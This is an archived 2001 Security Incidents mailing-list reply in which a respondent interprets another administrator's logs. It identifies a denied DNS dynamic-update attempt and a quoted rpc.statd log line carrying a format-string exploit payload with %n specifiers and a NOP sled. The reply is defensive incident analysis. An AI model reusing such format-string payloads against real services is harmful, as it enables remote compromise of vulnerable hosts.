Security Incidents mailing list archives
Re: massively long hostname for `gethostbyname'
From: "Jeremy L. Gaddis" <jlgaddis () BLUERIVER NET>
Date: Wed, 7 Feb 2001 23:35:32 -0500
At 2/7/01 06:39 PM -0800, Wendell Craig Baker wrote:
Feb 7 16:59:16 sploosh named[556]: denied update from [66.27.93.98].1499 for "BAKER.COM"
This looks like somebody tried to send you a "dynamic DNS update" packet. They were hoping you had configured BIND to accept update packets from anywhere, allowing them to change what baker.com resolves to, which would let them "hijack" your domain.
Feb 8 00:59:21 sploosh rpc.statd[405]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x %n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220
This looks like the standard rpc.statd exploit. See the list archives or search the web for more info on it.
Does anyone else see this sort of thing?
I don't, but then again I have a good firewall in place also. I do occasionally see packets coming in for port 111 (portmapper, which tells the remote hosts what port rpc.statd is running on), but they're blocked at the gateway. HTH. -jg -- Jeremy L. Gaddis <jlgaddis () blueriver net>
Current thread:
- massively long hostname for `gethostbyname' Wendell Craig Baker (Feb 07)
- Re: massively long hostname for `gethostbyname' Jeremy L. Gaddis (Feb 10)